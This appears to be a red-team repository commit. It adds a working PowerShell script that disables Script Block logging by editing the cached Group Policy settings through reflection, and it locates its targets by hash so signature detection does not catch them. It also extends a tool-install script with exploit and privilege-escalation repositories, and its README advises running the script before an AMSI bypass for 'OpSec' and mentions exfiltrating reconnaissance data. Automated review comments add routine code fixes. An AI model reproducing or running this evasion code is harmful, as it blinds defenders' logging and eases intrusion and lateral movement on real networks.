Added Script Block logging bypass:

This commit is contained in:
mb 2019-06-19 15:48:24 +02:00
parent db9e879c44
commit afaac0b552
4 changed files with 220 additions and 12 deletions


@ -72,7 +72,7 @@ wget https://gist.githubusercontent.com/mgeeky/8b7b1c8d9fe8be69978d774bddb6e382/
cd $ROOT_DIR/tools
mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,ssl,sourceaudit,shells,wireless}
mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,privesc,ssl,sourceaudit,shells,wireless}
git_clone https://github.com/mgeeky/Penetration-Testing-Tools
@ -203,6 +203,10 @@ git_clone https://github.com/wireghoul/graudit.git
git_clone https://github.com/netbiosX/Checklists.git
popd
pushd privesc
git_clone https://github.com/AusJock/Privilege-Escalation.git
popd
pushd recon
git_clone https://github.com/FortyNorthSecurity/EyeWitness.git
git_clone https://github.com/OWASP/Amass.git
@ -233,6 +237,11 @@ git_clone https://github.com/dxa4481/truffleHog.git
popd
pushd redteam
git_clone https://github.com/jaredhaight/PSAttack.git
cd PSAttack
wget https://github.com/jaredhaight/PSAttack/releases/download/v1.99.1/PSAttack-1.99.1.zip
unzip -d . PSAttack-1.99.1.zip
cd ..
git_clone https://github.com/danielbohannon/Invoke-Obfuscation.git
git_clone https://github.com/FuzzySecurity/PowerShell-Suite.git
git_clone https://github.com/rvrsh3ll/Misc-Powershell-Scripts.git
@ -410,9 +419,11 @@ popd
pushd windows
git_clone https://github.com/M4ximuss/Powerless.git
git_clone https://github.com/SecWiki/windows-kernel-exploit.git
git_clone https://github.com/SecWiki/windows-kernel-exploits.git
git_clone https://github.com/smgorelik/Windows-RCE-exploits.git
git_clone https://github.com/abatchy17/WindowsExploits.git
git_clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
git_clone https://github.com/brianwrf/WinSystemHelper.git
git_clone https://github.com/pentestmonkey/windows-privesc-check.git
git_clone https://github.com/rootm0s/WinPwnage.git
cd WinPwnage
@ -424,7 +435,7 @@ popd
pushd wireless
git_clone https://github.com/brav0hax/easy-creds.git
git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; ./kali-setup ; cd ..
git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; yes | ./kali-setup ; cd ..
git_clone https://github.com/derv82/wifite2.git ; cd wifite2 ; python setup.py install ; cd ..
popd
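Review bot: The new PSAttack block (`cd PSAttack` / `wget …PSAttack-1.99.1.zip` / `unzip -d . PSAttack-1.99.1.zip` / `cd ..`) fetches a release archive over the network and extracts it with no integrity check, and nothing guards the `cd`: if `git_clone` (defined outside this hunk) fails, `cd PSAttack` fails too, `wget` and `unzip` then run one level up inside `redteam`, and the trailing `cd ..` leaves the shell above the directory the enclosing `pushd redteam` … `popd` pair assumes. Running the steps in a subshell chained with `&&` and checking the archive against a pinned digest avoids both problems: `(cd PSAttack && wget https://github.com/jaredhaight/PSAttack/releases/download/v1.99.1/PSAttack-1.99.1.zip && printf '%s  %s\n' "<EXPECTED_SHA256>" PSAttack-1.99.1.zip | sha256sum -c - && unzip -d . PSAttack-1.99.1.zip)`, where `<EXPECTED_SHA256>` is the published checksum for that release. The `cd eaphammer ; yes | ./kali-setup ; cd ..` line in the wireless hunk has the same unguarded `cd` shape and would benefit from the same subshell-and-`&&` treatment. The script is flat top-level code, so these hunks are not inside any function.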


@ -723,20 +723,62 @@ function Disable-Amsi
return $false
}
function BlockLoggingBypass
function Disable-ScriptLogging
{
try
function ScriptLogging-Technique1
{
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197}
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746}
$foo.SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]'))
return $true
$out = $foo.GetValue($null)
$k0 = ""
foreach ($item in $out){
if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging
$k0 = $item
break
}
Catch
}
#$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string]))
Write-Host "[+] Finished applying technique 1"
return $k0
}
function ScriptLogging-Technique2($k0)
{
return $false
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} # SysXtem.ManaXgement.AutomaXtion.dll
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings
if(-not $foo -or $foo -eq $null) {
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings
}
if($foo) {
$cache = $foo.GetValue($null)
$k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging
if($k1 -and $cache[$k1]) {
$k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging
$k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging
if($k2 -and $cache[$k1][$k2]) {
$cache[$k1][$k2] = 0
}
if($k3 -and $cache[$k1][$k3]) {
$cache[$k1][$k3] = 0
}
}
$vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$vl.Add('Enabl'+'e'+$k0, 0)
$k01 = $k0 -replace 'kL', 'kInvocationL'
$vl.Add('Ena'+'ble'+$k01, 0)
$cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl
}
Write-Host "[+] Finished applying technique 2"
}
$out = ScriptLogging-Technique1
ScriptLogging-Technique2 $out
return $true
}
function Check-IsAdmin {
@ -760,11 +802,11 @@ function Disable-Amsi
}
if ($DontDisableBlockLogging -eq $false) {
if (BlockLoggingBypass) {
if (Disable-ScriptLogging) {
Write-Host "[+] Disabled Script Block logging."
}
else {
Write-Host "[-] Could not disblae Script Block logging."
Write-Host "[-] Could not disable Script Block logging."
}
}


@ -0,0 +1,151 @@
#requires -version 5
<#
.SYNOPSIS
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in
an approach to avoid signatured or otherwise considered harmful keywords.
Notice: These techniques only disable Script Block logging within current process context. Tricks implemented
are not system-wide and not permament.
Using a hash-lookup approach when determining prohibited symbol names, we are able
to avoid relying on blacklisted values and having them hardcoded within the script.
This implementation iterates over all of the assemblies, their exposed types, methods and
fields in order to find those that are required but by their computed hash-value rather than
direct name. Since hash-value computation algorithm was open-sources and is simple to
manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
A simplest approach to alter return values coming out of Get-Hash would be to change the
initial value of $val variable.
The script comes up with several techniques implemented. Triggers them one by one. Should one
return successfully, the script is going to finish it's execution.
The approaches implemented in this script heavily rely on the previous work of:
- Ryan Cobb: https://cobbr.io/ScripXXXtBlock-Logging-BypXXXass.html
- Ryan Cobb: https://cobbr.io/ScriptXXXBlock-Warning-Event-Logging-BypXXXass.html
.EXAMPLES
PS> Disable-ScriptLogging
#>
function Disable-ScriptLogging
{
function bitshift
{
param(
[Parameter(Mandatory,Position=0)]
[long]$x,
[Parameter(ParameterSetName='Left')]
[ValidateRange(0,[int]::MaxValue)]
[int]$Left,
[Parameter(ParameterSetName='Right')]
[ValidateRange(0,[int]::MaxValue)]
[int]$Right
)
$shift = if($PSCmdlet.ParameterSetName -eq 'Left')
{
$Left
}
else
{
-$Right
}
$ret = [math]::Floor($x * [math]::Pow(2,$shift))
return [System.Convert]::TOUInt32($ret -band ([uint32]::MaxValue))
}
function Get-Hash
{
param(
[Parameter(Mandatory = $true)]
[AllowEmptyString()]
[string]$name
)
if ($name.Length -eq 0)
{
return 0
}
$name = $name.ToLower();
$val = 5381
for($i = 0; $i -lt $name.Length; $i++)
{
$n = bitshift $val -left 5
$val = ($n + $val) + [byte][char]$name[$i]
}
return $val
}
function ScriptLogging-Technique1
{
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197}
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746}
$out = $foo.GetValue($null)
$k0 = ""
foreach ($item in $out){
if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging
$k0 = $item
break
}
}
#$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string]))
Write-Host "[+] Finished applying technique 1"
return $k0
}
function ScriptLogging-Technique2($k0)
{
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} # SysXtem.ManaXgement.AutomaXtion.dll
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings
if(-not $foo -or $foo -eq $null) {
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings
}
if($foo) {
$cache = $foo.GetValue($null)
$k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging
if($k1 -and $cache[$k1]) {
$k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging
$k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging
if($k2 -and $cache[$k1][$k2]) {
$cache[$k1][$k2] = 0
}
if($k3 -and $cache[$k1][$k3]) {
$cache[$k1][$k3] = 0
}
}
$vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$vl.Add('Enabl'+'e'+$k0, 0)
$k01 = $k0 -replace 'kL', 'kInvocationL'
$vl.Add('Ena'+'ble'+$k01, 0)
$cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl
}
Write-Host "[+] Finished applying technique 2"
}
$out = ScriptLogging-Technique1
ScriptLogging-Technique2 $out
}
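Review bot: The comment-based help in this new file does not describe the code beneath it: the .DESCRIPTION says the techniques are triggered one by one and that the script finishes as soon as one returns successfully, but the body of Disable-ScriptLogging ends with `$out = ScriptLogging-Technique1` followed by an unconditional `ScriptLogging-Technique2 $out`, with no success check between them. The `.EXAMPLES` heading is also not a recognised comment-based-help keyword, so Get-Help will not render the example; it should be `.EXAMPLE`. A few typos in the same block ("techniqus", "permament", "open-sources", "finish it's execution") are worth fixing while the text is revised. I would replace the "Should one return successfully…" sentence with `Both techniques are applied in sequence; the value returned by technique 1 is passed as input to technique 2.` so the help matches the actual control flow.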


@ -39,6 +39,10 @@ PS > "amsiInitFailed"
amsiInitFailed
```
- **`Disable-ScriptLogging.ps1`** - Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords.
*Warning:* This scriptlet should be launched first, before `Disable-Amsi.ps1` for better OpSec experience.
- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`.